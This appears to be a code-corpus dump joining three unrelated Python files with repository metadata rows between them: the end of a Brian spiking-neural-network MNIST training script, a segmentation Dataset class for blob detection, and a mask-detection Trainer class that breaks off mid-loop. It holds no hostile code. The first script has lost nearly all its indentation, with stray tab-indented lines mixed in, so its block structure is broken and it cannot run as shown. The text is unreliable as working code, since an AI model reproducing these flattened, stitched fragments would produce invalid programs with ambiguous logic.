# plot the input at this step
if do_plot:
input_image_monitor = update_input(rates, input_image_monitor, input_image)
# run the network for a single example time
b.run(single_example_time)
# add Gaussian noise to weights after each iteration
if weights_noise:
input_connections['XeAe'].W.alldata[:] *= 1 + (np.random.randn(n_input * conv_features) * weights_noise_constant)
# get new neuron label assignments every 'update_interval'
if j % update_interval == 0 and j > 0:
assignments, accumulated_rates, spike_proportions = assign_labels(result_monitor, input_numbers[j - update_interval : j], accumulated_rates, accumulated_inputs)
# get count of spikes over the past iteration
current_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e)) - previous_spike_count
previous_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e))
# make sure synapse weights don't grow too large
normalize_weights()
		if j % weight_update_interval == 0 and save_weights:
save_connections(weights_dir, connections, input_connections, ending, j)
save_theta(weights_dir, population_names, neuron_groups, ending, j)
np.save(os.path.join(assignments_dir, '_'.join(['assignments', ending, str(j)])), assignments)
np.save(os.path.join(misc_dir, '_'.join(['accumulated_rates', ending, str(j)])), accumulated_rates)
np.save(os.path.join(misc_dir, '_'.join(['spike_proportions', ending, str(j)])), spike_proportions)
if j % weight_update_interval == 0:
deltas[j / weight_update_interval] = np.sum(np.abs((input_connections['XeAe'][:].todense() - last_weights)))
if plot_all_deltas:
all_deltas[j / weight_update_interval, :] = np.ravel(input_connections['XeAe'][:].todense() - last_weights)
last_weights = input_connections['XeAe'][:].todense()
# pickling performance recording and iteration number
p.dump((j, deltas), open(os.path.join(deltas_dir, ending + '.p'), 'wb'))
# update weights every 'weight_update_interval'
if j % weight_update_interval == 0 and do_plot:
update_weights_and_assignments(weights_assignments_figure, weights_axes, assignments_axes, \
weights_image, assignments_image, assignments, current_spike_count)
# if the neurons in the network didn't spike more than four times
if np.sum(current_spike_count) < 5 and num_retries < 3:
# increase the intensity of input
input_intensity += 2
num_retries += 1
# set all network firing rates to zero
for name in input_population_names:
input_groups[name + 'e'].rate = 0
# let the network relax back to equilibrium
if not reset_state_vars:
b.run(resting_time)
else:
for neuron_group in neuron_groups:
neuron_groups[neuron_group].v = v_reset_e
neuron_groups[neuron_group].ge = 0
neuron_groups[neuron_group].gi = 0
# otherwise, record results and continue simulation
else:
num_retries = 0
if j == increase_iter:
for feature in xrange(conv_features):
for other_feature in xrange(conv_features):
if feature != other_feature:
for n in xrange(n_e):
connections['AiAe'][feature * n_e + n, \
other_feature * n_e + n] = max_inhib
# record the current number of spikes
result_monitor[j % update_interval, :] = current_spike_count
# get true label of last input example
input_numbers[j] = data['y'][j % data_size][0]
activity = result_monitor[j % update_interval, :] / np.sum(result_monitor[j % update_interval, :])
if do_plot and save_spikes:
fig = plt.figure(9, figsize = (8, 8))
plt.imshow(rates.reshape((28, 28)), interpolation='nearest', vmin=0, vmax=64, cmap='binary')
plt.title(str(data['y'][j % data_size][0]) + ' : ' + ', '.join( \
[str(int(output_numbers[scheme][j, 0])) for scheme in voting_schemes]))
fig = plt.figure(10, figsize = (7, 7))
plt.xticks(xrange(features_sqrt))
plt.yticks(xrange(features_sqrt))
plt.title('Activity heatmap (total spikes = ' + str(np.sum(result_monitor[j % update_interval, :])) + ')')
plt.imshow(activity.reshape((features_sqrt, features_sqrt)).T, interpolation='nearest', cmap='binary')
plt.grid(True)
fig.canvas.draw()
if save_spikes:
np.save(os.path.join(spikes_dir, '_'.join([ending, 'spike_counts', str(j)])), current_spike_count)
np.save(os.path.join(spikes_dir, '_'.join([ending, 'rates', str(j)])), rates)
# get network filter weights
filters = input_connections['XeAe'][:].todense()
# get the output classifications of the network
for scheme, outputs in predict_label(assignments, result_monitor[j % update_interval, :], \
accumulated_rates, spike_proportions).items():
if scheme != 'distance':
output_numbers[scheme][j, :] = outputs
elif scheme == 'distance':
current_input = (rates * (weight['ee_input'] / np.sum(rates))).ravel()
output_numbers[scheme][j, 0] = assignments[np.argmin([ euclidean(current_input, \
filters[:, i]) for i in xrange(conv_features) ])]
# print progress
if j % print_progress_interval == 0 and j > 0:
print 'runs done:', j, 'of', int(num_examples), '(time taken for past', print_progress_interval, 'runs:', str(timeit.default_timer() - start_time) + ')'
start_time = timeit.default_timer()
if j % weight_update_interval == 0 and do_plot:
update_deltas_plot(line, deltas, j, deltas_figure)
if plot_all_deltas:
update_all_deltas_plot(lines, all_deltas, j, all_deltas_figure)
# plot performance if appropriate
if (j % update_interval == 0 or j == num_examples - 1) and j > 0:
if do_plot:
# updating the performance plot
perf_plot, performances, wrong_idxs, wrong_labels = update_performance_plot(performance_monitor, performances, j, fig_performance)
else:
performances, wrong_idxs, wrong_labels = get_current_performance(performances, j)
# pickling performance recording and iteration number
p.dump((j, performances), open(os.path.join(performance_dir, ending + '.p'), 'wb'))
# Save the best model's weights and theta parameters (if so specified)
if save_best_model:
for performance in performances:
if performances[performance][int(j / float(update_interval))] > best_performance:
print '\n', 'Best model thus far! Voting scheme:', performance, '\n'
best_performance = performances[performance][int(j / float(update_interval))]
save_connections(best_weights_dir, connections, input_connections, ending, 'best')
save_theta(best_weights_dir, population_names, neuron_groups, ending, 'best')
np.save(os.path.join(best_assignments_dir, '_'.join(['assignments', ending, 'best'])), assignments)
np.save(os.path.join(best_misc_dir, '_'.join(['accumulated_rates', ending, 'best'])), accumulated_rates)
np.save(os.path.join(best_misc_dir, '_'.join(['spike_proportions', ending, 'best'])), spike_proportions)
# Print out performance progress intermittently
for performance in performances:
print '\nClassification performance (' + performance + ')', performances[performance][1:int(j / float(update_interval)) + 1], \
'\nAverage performance:', sum(performances[performance][1:int(j / float(update_interval)) + 1]) / \
float(len(performances[performance][1:int(j / float(update_interval)) + 1])), \
'\nBest performance:', max(performances[performance][1:int(j / float(update_interval)) + 1]), '\n'
# set input firing rates back to zero
for name in input_population_names:
input_groups[name + 'e'].rate = 0
# run the network for 'resting_time' to relax back to rest potentials
if not reset_state_vars:
b.run(resting_time)
else:
for neuron_group in neuron_groups:
neuron_groups[neuron_group].v = v_reset_e
neuron_groups[neuron_group].ge = 0
neuron_groups[neuron_group].gi = 0
# bookkeeping
input_intensity = start_input_intensity
j += 1
# ensure weights don't grow without bound
normalize_weights()
print '\n'
def run_test():
global fig_num, input_intensity, previous_spike_count, rates, assignments, clusters, cluster_assignments, \
simple_clusters, simple_cluster_assignments, index_matrix, accumulated_rates, \
accumulated_inputs, spike_proportions
# set up performance recording and plotting
num_evaluations = int(num_examples / update_interval) + 1
performances = { voting_scheme : np.zeros(num_evaluations) for voting_scheme in voting_schemes }
num_weight_updates = int(num_examples / weight_update_interval)
all_deltas = np.zeros((num_weight_updates, (conv_size ** 2) * n_e_total))
deltas = np.zeros(num_weight_updates)
# initialize network
j = 0
num_retries = 0
b.run(0)
# get network filter weights
filters = input_connections['XeAe'][:].todense()
# start recording time
start_time = timeit.default_timer()
while j < num_examples:
# get the firing rates of the next input example
rates = (data['x'][j % data_size, :, :] / 8.0) * input_intensity
# sets the input firing rates
input_groups['Xe'].rate = rates.reshape(n_input)
# run the network for a single example time
b.run(single_example_time)
# get count of spikes over the past iteration
current_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e)) - previous_spike_count
previous_spike_count = np.copy(spike_counters['Ae'].count[:]).reshape((conv_features, n_e))
# if the neurons in the network didn't spike more than four times
if np.sum(current_spike_count) < 5 and num_retries < 3:
# increase the intensity of input
input_intensity += 2
num_retries += 1
# set all network firing rates to zero
for name in input_population_names:
input_groups[name + 'e'].rate = 0
# let the network relax back to equilibrium
if not reset_state_vars:
b.run(resting_time)
else:
for neuron_group in neuron_groups:
neuron_groups[neuron_group].v = v_reset_e
neuron_groups[neuron_group].ge = 0
neuron_groups[neuron_group].gi = 0
# otherwise, record results and continue simulation
else:
num_retries = 0
# record the current number of spikes
result_monitor[j % update_interval, :] = current_spike_count
# get true label of the past input example
input_numbers[j] = data['y'][j % data_size][0]
# get the output classifications of the network
for scheme, outputs in predict_label(assignments, result_monitor[j % update_interval, :], accumulated_rates, spike_proportions).items():
if scheme != 'distance':
output_numbers[scheme][j, :] = outputs
elif scheme == 'distance':
current_input = (rates * (weight['ee_input'] / np.sum(rates))).ravel()
output_numbers[scheme][j, 0] = assignments[np.argmin([ euclidean(current_input, \
filters[:, i]) for i in xrange(conv_features) ])]
# print progress
if j % print_progress_interval == 0 and j > 0:
print 'runs done:', j, 'of', int(num_examples), '(time taken for past', print_progress_interval, 'runs:', str(timeit.default_timer() - start_time) + ')'
start_time = timeit.default_timer()
# set input firing rates back to zero
for name in input_population_names:
input_groups[name + 'e'].rate = 0
# run the network for 'resting_time' to relax back to rest potentials
if not reset_state_vars:
b.run(resting_time)
else:
for neuron_group in neuron_groups:
neuron_groups[neuron_group].v = v_reset_e
neuron_groups[neuron_group].ge = 0
neuron_groups[neuron_group].gi = 0
# bookkeeping
input_intensity = start_input_intensity
j += 1
print '\n'
def save_results():
'''
Save results of simulation (train or test)
'''
print '...Saving results'
if not test_mode:
save_connections(end_weights_dir, connections, input_connections, ending, 'end')
save_theta(end_weights_dir, population_names, neuron_groups, ending, 'end')
np.save(os.path.join(end_assignments_dir, '_'.join(['assignments', ending, 'end'])), assignments)
np.save(os.path.join(end_misc_dir, '_'.join(['accumulated_rates', ending, 'end'])), accumulated_rates)
np.save(os.path.join(end_misc_dir, '_'.join(['spike_proportions', ending, 'end'])), spike_proportions)
else:
np.save(os.path.join(activity_dir, '_'.join(['results', str(num_examples), ending])), result_monitor)
np.save(os.path.join(activity_dir, '_'.join(['input_numbers', str(num_examples), ending])), input_numbers)
print '\n'
def evaluate_results():
'''
	Evaluate the network using the various voting schemes in test mode.
'''
global update_interval
test_results = {}
for scheme in voting_schemes:
test_results[scheme] = np.zeros((10, num_examples))
print '\n...Calculating accuracy per voting scheme'
# get network filter weights
filters = input_connections['XeAe'][:].todense()
# for idx in xrange(end_time_testing - end_time_training):
for idx in xrange(num_examples):
label_rankings = predict_label(assignments, result_monitor[idx, :], accumulated_rates, spike_proportions)
for scheme in voting_schemes:
if scheme != 'distance':
test_results[scheme][:, idx] = label_rankings[scheme]
elif scheme == 'distance':
rates = (data['x'][idx % data_size, :, :] / 8.0) * input_intensity
current_input = (rates * (weight['ee_input'] / np.sum(rates))).ravel()
results = np.zeros(10)
results[0] = assignments[np.argmin([ euclidean(current_input, \
filters[:, i]) for i in xrange(conv_features) ])]
test_results[scheme][:, idx] = results
print test_results
differences = { scheme : test_results[scheme][0, :] - input_numbers for scheme in voting_schemes }
correct = { scheme : len(np.where(differences[scheme] == 0)[0]) for scheme in voting_schemes }
incorrect = { scheme : len(np.where(differences[scheme] != 0)[0]) for scheme in voting_schemes }
accuracies = { scheme : correct[scheme] / float(num_examples) * 100 for scheme in voting_schemes }
conf_matrices = np.array([confusion_matrix(test_results[scheme][0, :], \
input_numbers) for scheme in voting_schemes])
np.save(os.path.join(results_path, '_'.join(['confusion_matrix', ending]) + '.npy'), conf_matrices)
print '\nConfusion matrix:\n\n', conf_matrices
for scheme in voting_schemes:
print '\n-', scheme, 'accuracy:', accuracies[scheme]
results = pd.DataFrame([ [ ending ] + accuracies.values() ], columns=[ 'Model' ] + accuracies.keys())
filename = '_'.join([str(conv_features), 'results.csv'])
if not filename in os.listdir(results_path):
results.to_csv(os.path.join(results_path, filename), index=False)
else:
all_results = pd.read_csv(os.path.join(results_path, filename))
all_results = pd.concat([all_results, results], ignore_index=True)
all_results.to_csv(os.path.join(results_path, filename), index=False)
print '\n'
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--mode', default='train', help='Network operating mode: \
"train" mode learns the synaptic weights of the network, and \
"test" mode holds the weights fixed / evaluates accuracy on test data.')
parser.add_argument('--conv_size', type=int, default=28, help='Side length of the square convolution \
window used by the input -> excitatory layer of the network.')
parser.add_argument('--conv_stride', type=int, default=0, help='Horizontal, vertical stride \
of the convolution window used by input layer of the network.')
parser.add_argument('--conv_features', type=int, default=100, help='Number of excitatory \
convolutional features / filters / patches used in the network.')
parser.add_argument('--do_plot', type=str, default='False', help='Whether or not to display plots during network \
training / testing. Defaults to False, as this makes the \
network operation speedier, and possible to run on HPC resources.')
	parser.add_argument('--num_train', type=int, default=10000, help='The number of \
						examples on which to train the network.')
	parser.add_argument('--num_test', type=int, default=10000, help='The number of \
						examples on which to test the network.')
parser.add_argument('--random_seed', type=int, default=0, help='The random seed \
(any integer) from which to generate random numbers.')
parser.add_argument('--save_weights', type=str, default='False', help='Whether or not to \
save the weights of the model every `weight_update_interval`.')
parser.add_argument('--weight_update_interval', type=int, default=10, help='How often \
to update the plot of network filter weights.')
parser.add_argument('--save_best_model', type=str, default='True', help='Whether \
to save the current best version of the model.')
parser.add_argument('--update_interval', type=int, default=250, help='How often \
to update neuron labels and classify new inputs.')
parser.add_argument('--plot_all_deltas', type=str, default='False', help='Whether or not to \
plot weight changes for all neurons from input to excitatory layer.')
parser.add_argument('--train_remove_inhibition', type=str, default='False', help='Whether or not to \
remove lateral inhibition during the training phase.')
parser.add_argument('--test_no_inhibition', type=str, default='False', help='Whether or not to \
remove lateral inhibition during the test phase.')
parser.add_argument('--test_max_inhibition', type=str, default='False', help='Whether or not to \
use ETH-style inhibition during the test phase.')
parser.add_argument('--start_inhib', type=float, default=0.1, help='The beginning value \
						of inhibition for the increasing scheme.')
parser.add_argument('--max_inhib', type=float, default=17.4, help='The maximum synapse \
weight for inhibitory to excitatory connections.')
parser.add_argument('--reset_state_vars', type=str, default='False', help='Whether to \
reset neuron / synapse state variables or run a "reset" period.')
parser.add_argument('--inhib_update_interval', type=int, default=250, \
help='How often to increase the inhibition strength.')
parser.add_argument('--inhib_schedule', type=str, default='linear', help='How to \
update the strength of inhibition as the training progresses.')
parser.add_argument('--save_spikes', type=str, default='False', help='Whether or not to \
save 2D graphs of spikes to later use to make an activity time-lapse.')
parser.add_argument('--normalize_inputs', type=str, default='False', help='Whether or not \
to ensure all inputs contain the same amount of "ink".')
parser.add_argument('--proportion_low', type=float, default=0.5, help='What proportion of \
the training to grow the inhibition from "start_inhib" to "max_inhib".')
parser.add_argument('--noise_const', type=float, default=0.0, help='The scale of the \
noise added to input examples.')
parser.add_argument('--inhib_scheme', type=str, default='increasing', help='How inhibition from \
inhibitory to excitatory neurons is handled.')
parser.add_argument('--weights_noise', type=str, default='False', help='Whether to use multiplicative \
Gaussian noise on synapse weights on each iteration.')
parser.add_argument('--weights_noise_constant', type=float, default=1e-2, help='The spread of the \
						Gaussian noise used on synapse weights.')
parser.add_argument('--start_input_intensity', type=float, default=2.0, help='The intensity at which the \
input is (default) presented to the network.')
parser.add_argument('--test_adaptive_threshold', type=str, default='False', help='Whether or not to allow \
neuron thresholds to adapt during the test phase.')
parser.add_argument('--train_time', type=float, default=0.35, help='How long training \
inputs are presented to the network.')
parser.add_argument('--train_rest', type=float, default=0.15, help='How long the network is allowed \
to settle back to equilibrium between training examples.')
parser.add_argument('--test_time', type=float, default=0.35, help='How long test \
inputs are presented to the network.')
parser.add_argument('--test_rest', type=float, default=0.15, help='How long the network is allowed \
to settle back to equilibrium between test examples.')
parser.add_argument('--dt', type=float, default=0.25, help='Integration time step in milliseconds.')
# parse arguments and place them in local scope
args = parser.parse_args()
args = vars(args)
locals().update(args)
print '\nOptional argument values:'
for key, value in args.items():
print '-', key, ':', value
print '\n'
for var in [ 'do_plot', 'plot_all_deltas', 'reset_state_vars', 'test_max_inhibition', \
'normalize_inputs', 'save_weights', 'save_best_model', 'test_no_inhibition', \
'save_spikes', 'weights_noise', 'test_adaptive_threshold' ]:
if locals()[var] == 'True':
locals()[var] = True
elif locals()[var] == 'False':
locals()[var] = False
else:
raise Exception('Expecting True or False-valued command line argument "' + var + '".')
# test or training mode
test_mode = mode == 'test'
if test_mode:
num_examples = num_test
else:
num_examples = num_train
if test_mode:
data_size = 10000
else:
data_size = 60000
# At which iteration do we increase the inhibition to the ETH level?
increase_iter = int(num_train * proportion_low)
# set brian global preferences
b.set_global_preferences(defaultclock = b.Clock(dt=dt*b.ms), useweave = True, gcc_options = ['-ffast-math -march=native'], usecodegen = True,
usecodegenweave = True, usecodegenstateupdate = True, usecodegenthreshold = False, usenewpropagate = True, usecstdp = True, openmp = False,
magic_useframes = False, useweave_linear_diffeq = True)
# for reproducibility's sake
np.random.seed(random_seed)
start = timeit.default_timer()
data = get_labeled_data(os.path.join(MNIST_data_path, 'testing' if test_mode else 'training'),
not test_mode, False, xrange(10), 1000, normalize_inputs)
print 'Time needed to load data:', timeit.default_timer() - start
# set parameters for simulation based on train / test mode
record_spikes = True
# number of inputs to the network
n_input = 784
n_input_sqrt = int(math.sqrt(n_input))
# number of neurons parameters
if conv_size == 28 and conv_stride == 0:
n_e = 1
else:
n_e = ((n_input_sqrt - conv_size) / conv_stride + 1) ** 2
n_e_total = n_e * conv_features
n_e_sqrt = int(math.sqrt(n_e))
n_i = n_e
features_sqrt = int(math.ceil(math.sqrt(conv_features)))
# time (in seconds) per data example presentation and rest period in between
if not test_mode:
single_example_time = train_time * b.second
resting_time = train_rest * b.second
else:
single_example_time = test_time * b.second
resting_time = test_rest * b.second
# set the update interval
if test_mode:
update_interval = num_examples
# weight updates and progress printing intervals
print_progress_interval = 10
# rest potential parameters, reset potential parameters, threshold potential parameters, and refractory periods
v_rest_e, v_rest_i = -65. * b.mV, -60. * b.mV
v_reset_e, v_reset_i = -65. * b.mV, -45. * b.mV
v_thresh_e, v_thresh_i = -52. * b.mV, -40. * b.mV
refrac_e, refrac_i = 5. * b.ms, 2. * b.ms
# dictionaries for weights and delays
weight, delay = {}, {}
# populations, connections, saved connections, etc.
input_population_names = [ 'X' ]
population_names = [ 'A' ]
input_connection_names = [ 'XA' ]
save_conns = [ 'XeAe', 'AeAe' ]
# weird and bad names for variables, I think
input_conn_names = [ 'ee_input' ]
recurrent_conn_names = [ 'ei', 'ie', 'ee' ]
# setting weight, delay, and intensity parameters
weight['ee_input'] = (conv_size ** 2) * 0.099489796
delay['ee_input'] = (0 * b.ms, 10 * b.ms)
delay['ei_input'] = (0 * b.ms, 5 * b.ms)
input_intensity = start_input_intensity
current_inhibition = 1.0
# time constants, learning rates, max weights, weight dependence, etc.
tc_pre_ee, tc_post_ee = 20 * b.ms, 20 * b.ms
nu_ee_pre, nu_ee_post = 0.0001, 0.01
	nu_AeAe_pre, nu_AeAe_post = 0.1, 0.5  # names now match eqs_stdp_post_AeAe below
wmax_ee = 1.0
exp_ee_post = exp_ee_pre = 0.2
w_mu_pre, w_mu_post = 0.2, 0.2
# setting up differential equations (depending on train / test mode)
if test_mode and not test_adaptive_threshold:
scr_e = 'v = v_reset_e; timer = 0*ms'
else:
tc_theta = 1e7 * b.ms
theta_plus_e = 0.05 * b.mV
scr_e = 'v = v_reset_e; theta += theta_plus_e; timer = 0*ms'
offset = 20.0 * b.mV
v_thresh_e = '(v>(theta - offset + ' + str(v_thresh_e) + ')) * (timer>refrac_e)'
# equations for neurons
neuron_eqs_e = '''
dv/dt = ((v_rest_e - v) + (I_synE + I_synI) / nS) / (100 * ms) : volt
I_synE = ge * nS * -v : amp
I_synI = gi * nS * (-100.*mV-v) : amp
dge/dt = -ge/(1.0*ms) : 1
dgi/dt = -gi/(2.0*ms) : 1
'''
if test_mode:
neuron_eqs_e += '\n theta :volt'
else:
neuron_eqs_e += '\n dtheta/dt = -theta / (tc_theta) : volt'
neuron_eqs_e += '\n dtimer/dt = 100.0 : ms'
neuron_eqs_i = '''
dv/dt = ((v_rest_i - v) + (I_synE + I_synI) / nS) / (10*ms) : volt
I_synE = ge * nS * -v : amp
I_synI = gi * nS * (-85.*mV-v) : amp
dge/dt = -ge/(1.0*ms) : 1
dgi/dt = -gi/(2.0*ms) : 1
'''
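	# Both groups are conductance-based LIF neurons: e.g. the excitatory equation
	# above has a 100 ms membrane time constant, an excitatory reversal potential
	# of 0 mV (the bare -v term) and an inhibitory reversal of -100 mV.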
# STDP synaptic traces
eqs_stdp_ee = '''
dpre/dt = -pre / tc_pre_ee : 1.0
dpost/dt = -post / tc_post_ee : 1.0
'''
eqs_stdp_AeAe = '''
dpre/dt = -pre / tc_pre_ee : 1.0
dpost/dt = -post / tc_post_ee : 1.0
'''
# STDP rule (post-pre, no weight dependence)
eqs_stdp_pre_ee = 'pre = 1.; w -= nu_ee_pre * post'
eqs_stdp_post_ee = 'w += nu_ee_post * pre; post = 1.'
eqs_stdp_pre_AeAe = 'pre += 1.; w -= nu_AeAe_pre * post'
eqs_stdp_post_AeAe = 'w += nu_AeAe_post * pre; post += 1.'
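	# Worked sketch of the post-pre rule above: a presynaptic spike sets pre = 1
	# and depresses w by nu_ee_pre * post; a postsynaptic spike 20 ms later then
	# potentiates w by nu_ee_post * exp(-20ms / tc_pre_ee) ~= 0.01 * 0.37 = 0.0037.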
print '\n'
# set ending of filename saves
ending = '_'.join([ str(conv_size), str(conv_stride), str(conv_features), str(n_e), \
str(num_train), str(random_seed), str(proportion_low), \
str(start_inhib), str(max_inhib) ])
b.ion()
fig_num = 1
# creating dictionaries for various objects
neuron_groups, input_groups, connections, input_connections, stdp_methods, \
rate_monitors, spike_monitors, spike_counters, output_numbers = {}, {}, {}, {}, {}, {}, {}, {}, {}
# creating convolution locations inside the input image
convolution_locations = {}
for n in xrange(n_e):
convolution_locations[n] = [ ((n % n_e_sqrt) * conv_stride + (n // n_e_sqrt) * n_input_sqrt * \
conv_stride) + (x * n_input_sqrt) + y for y in xrange(conv_size) for x in xrange(conv_size) ]
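	# Example with the defaults conv_size = 28, conv_stride = 0: n_e = 1 and
	# convolution_locations[0] enumerates all 784 pixel indices, i.e. each
	# feature sees the whole input image.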
# instantiating neuron "vote" monitor
result_monitor = np.zeros((update_interval, conv_features, n_e))
# bookkeeping variables
previous_spike_count = np.zeros((conv_features, n_e))
input_numbers = np.zeros(num_examples)
rates = np.zeros((n_input_sqrt, n_input_sqrt))
if test_mode:
assignments = np.load(os.path.join(best_assignments_dir, '_'.join(['assignments', ending, 'best.npy'])))
accumulated_rates = np.load(os.path.join(best_misc_dir, '_'.join(['accumulated_rates', ending, 'best.npy'])))
spike_proportions = np.load(os.path.join(best_misc_dir, '_'.join(['spike_proportions', ending, 'best.npy'])))
else:
assignments = -1 * np.ones((conv_features, n_e))
# build the spiking neural network
build_network()
if test_mode:
voting_schemes = ['all', 'all_active', 'most_spiked_patch', 'most_spiked_location', 'confidence_weighting', \
'activity_neighborhood', 'most_spiked_neighborhood', 'distance']
else:
voting_schemes = ['all', 'all_active', 'most_spiked_patch', 'most_spiked_location', \
'confidence_weighting', 'activity_neighborhood', 'most_spiked_neighborhood']
for scheme in voting_schemes:
output_numbers[scheme] = np.zeros((num_examples, 10))
if not test_mode:
accumulated_rates = np.zeros((conv_features * n_e, 10))
accumulated_inputs = np.zeros(10)
spike_proportions = np.zeros((conv_features * n_e, 10))
# run the simulation of the network
if test_mode:
run_test()
else:
run_train()
# save and plot results
save_results()
# evaluate results
if test_mode:
evaluate_results()
|
[
"[email protected]"
] | |
2ac03ec918444160ad766c68aebfd92c369595f2
|
b7fbe103e03573cc7ac2d1c6f2d150377601f632
|
/dataset.py
|
c1b8ac03ef93e850adcab4d7e419613b8f3e0456
|
[] |
no_license
|
fortis3000/blob_detection
|
294736ab7befe6993fc5852ec35f193be434ead5
|
5b0d5adf86cfa0b41dd7e53d00dfff8dbb82fd13
|
refs/heads/master
| 2023-02-20T17:57:36.252672 | 2021-01-18T13:56:14 | 2021-01-18T13:56:14 | 330,676,190 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,818 |
py
|
"""
Bulk dataset module
"""
import os
import cv2
import matplotlib.pyplot as plt
import numpy as np
class Dataset:
"""
    Bulk segmentation dataset.
    Reads images and applies augmentation and preprocessing transformations.
    Args:
        images_dir (str): path to images folder
        masks_dir (str): path to segmentation masks folder
        classes (list): values of classes to extract from segmentation mask
        augmentations (albumentations.Compose): data transformation pipeline
            (e.g. flip, scale, etc.)
        preprocessing (albumentations.Compose): data preprocessing
            (e.g. normalization, shape manipulation, etc.)
    Example:
        dataset = Dataset(images_dir, masks_dir, classes=['bulk'])
"""
CLASSES = ["bulk"]
def __init__(
self,
images_dir: str,
masks_dir: str,
classes=None,
augmentations=None,
preprocessing=None,
):
self.ids = os.listdir(images_dir)
self.images_fps = [
os.path.join(images_dir, image_id) for image_id in self.ids
]
self.masks_fps = [
os.path.join(masks_dir, mask_id) for mask_id in self.ids
]
        if classes is None:
            classes = self.CLASSES
        self.class_values = [self.CLASSES.index(c.lower()) + 1 for c in classes]
self.augmentations = augmentations
self.preprocessing = preprocessing
def __getitem__(self, item):
# read data
image = cv2.imread(self.images_fps[item])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
mask = cv2.imread(self.masks_fps[item], 0)
        assert mask is not None, (
            f"Mask can't be read,"
            f" mask: {self.masks_fps[item]},"
            f" image: {self.images_fps[item]}"
        )
        # masks are stored as 0/255 grayscale images; scale them to 0/1
        mask //= 255
# extract class from mask
masks = [(mask == v) for v in self.class_values]
mask = np.stack(masks, axis=-1).astype("float")
# add background if mask is not binary
if mask.shape[-1] != 1:
background = 1 - mask.sum(axis=-1, keepdims=True)
mask = np.concatenate((mask, background), axis=-1)
# apply augmentations
if self.augmentations:
sample = self.augmentations(image=image, mask=mask)
image, mask = sample["image"], sample["mask"]
# apply preprocessing
if self.preprocessing:
sample = self.preprocessing(image=image, mask=mask)
image, mask = sample["image"], sample["mask"]
return image, mask
def __len__(self):
return len(self.ids)
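# A minimal sketch (not part of the original module) of the kind of pipeline
# the `augmentations`/`preprocessing` arguments expect; it assumes the
# `albumentations` package is installed, and the crop size is arbitrary:
#
#     import albumentations as A
#     train_augs = A.Compose([
#         A.HorizontalFlip(p=0.5),
#         A.RandomCrop(height=256, width=256),
#     ])
#     dataset = Dataset(images_dir, masks_dir, classes=["bulk"],
#                       augmentations=train_augs)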
def visualize(save_name: str = None, **images):
"""Plots images in one row"""
n = len(images)
plt.figure(figsize=(16, 5))
for i, (name, image) in enumerate(images.items()):
plt.subplot(1, n, i + 1)
plt.xticks([])
plt.yticks([])
plt.title(" ".join(name.split("_")).title())
# do not work with colab
if image.shape[-1] == 1:
plt.imshow(image.squeeze(-1))
else:
plt.imshow(image)
if save_name:
plt.savefig(save_name)
plt.close()
def denormalize(x):
"""Scale image to range 0..1 for correct plot"""
x_max = np.percentile(x, 98)
x_min = np.percentile(x, 2)
x = (x - x_min) / (x_max - x_min)
x = x.clip(0, 1)
return x
if __name__ == "__main__":
data_path = os.path.join("data", "raw")
dataset = Dataset(
images_dir=os.path.join(data_path, "val"),
masks_dir=os.path.join(data_path, "val_masks"),
classes=["bulk"],
augmentations=None,
preprocessing=None,
)
for i in range(20):
        image, mask = dataset[i]
        print(image.shape)
        print(mask.shape)
        visualize(image=image, bulk_mask=mask)
|
[
"[email protected]"
] | |
4e4423d83f7f75ce347ed72f5eb755161c853971
|
0938dfe5cd7678bc1fa5060019b944d3d7f319d6
|
/Trainer.py
|
26f95e2fad53db1befbc5e535967399c64896476
|
[] |
no_license
|
joon1230/Mask_Detection
|
04e4a0fb2999f79c1360435feffafb99bf9789c2
|
65cf464c6880afd4f88535628831577d1c5fae90
|
refs/heads/main
| 2023-06-02T02:31:10.620322 | 2021-06-18T03:38:35 | 2021-06-18T03:38:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,209 |
py
|
import os
import pandas as pd
import time
from functools import partial
import glob
import numpy as np
import torch
import torch.optim
from torch.utils.data import Dataset, DataLoader
from sklearn.metrics import f1_score
from sklearn.model_selection import train_test_split
import utils
import Datasets
class Trainer():
def __init__(self, model, model_name, transform, dataset, optimizer, learning_rate, weight_decay, batch_size,
train_ratio, loss_function, epoch, input_size, nick_name, load_size=None, scheduler=None):
self.model = model()
self.dataset = partial(dataset, transform = transform, size = load_size)
self.val_dataset = partial(Datasets.MaskDataset, transform=Datasets.transform_test(input_size=input_size))
self.learning_rate = learning_rate
self.weight_decay = weight_decay
self.train_ratio = train_ratio
self.batch_size = batch_size
self.train_test_split()
self.epoch = epoch
self.optimizer = optimizer(self.model.parameters(), lr=self.learning_rate, weight_decay=self.weight_decay)
        self.scheduler = scheduler(optimizer=self.optimizer) if scheduler else None
self.criterion = loss_function
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
self.model.to(self.device)
self.log = f"""| model_name : {model_name} | load_size : {load_size} | input_size : {input_size} | batch : {batch_size} |\n| train_people : {len(self.train_paths)} , val_people : {len(self.val_paths)} \n| loss function : {loss_function}\n| optimizer : {optimizer} | weight_decay : {weight_decay} | learning_rate : {learning_rate} \n| transform : {transform} """
self.save_path = f'{model_name}/{optimizer}/{model_name + nick_name}'
print(self.log)
def train(self):
        for i in range(1, self.epoch + 1):
            self.train_one_epoch(i)
            if self.train_ratio < 1:
                self.test_one_epoch(i)
            self.save_model(i, name='epoch', save_path=self.save_path)
def train_one_epoch(self, epoch):
self.model.train()
train_loss = 0
correct = 0
total = 0
load_time = 0
inference_time = 0
f1_score = 0
self.log += f"\n\n====train model epoch : {epoch}====\n"
print(f"\n\n====train model epoch : {epoch}====")
start_time = time.time()
for batch_idx, (inputs, labels) in enumerate(self.train_loader):
inputs, labels = inputs.to(self.device), labels.to(self.device)
s = time.time()
            self.optimizer.zero_grad()  # clear the gradients accumulated on each model parameter
outputs = self.model(inputs)
loss = self.criterion(outputs, labels)
loss.backward()
self.optimizer.step()
if self.scheduler:
self.scheduler.step()
train_loss += loss.item()
_, predicted = outputs.max(1)
total += labels.size(0)
correct += predicted.eq(labels).sum().item()
f1_score += self.f1_score(predicted, labels)
inference_time += time.time() - s
load_time = time.time() - start_time - inference_time
            if batch_idx % 10 == 0:
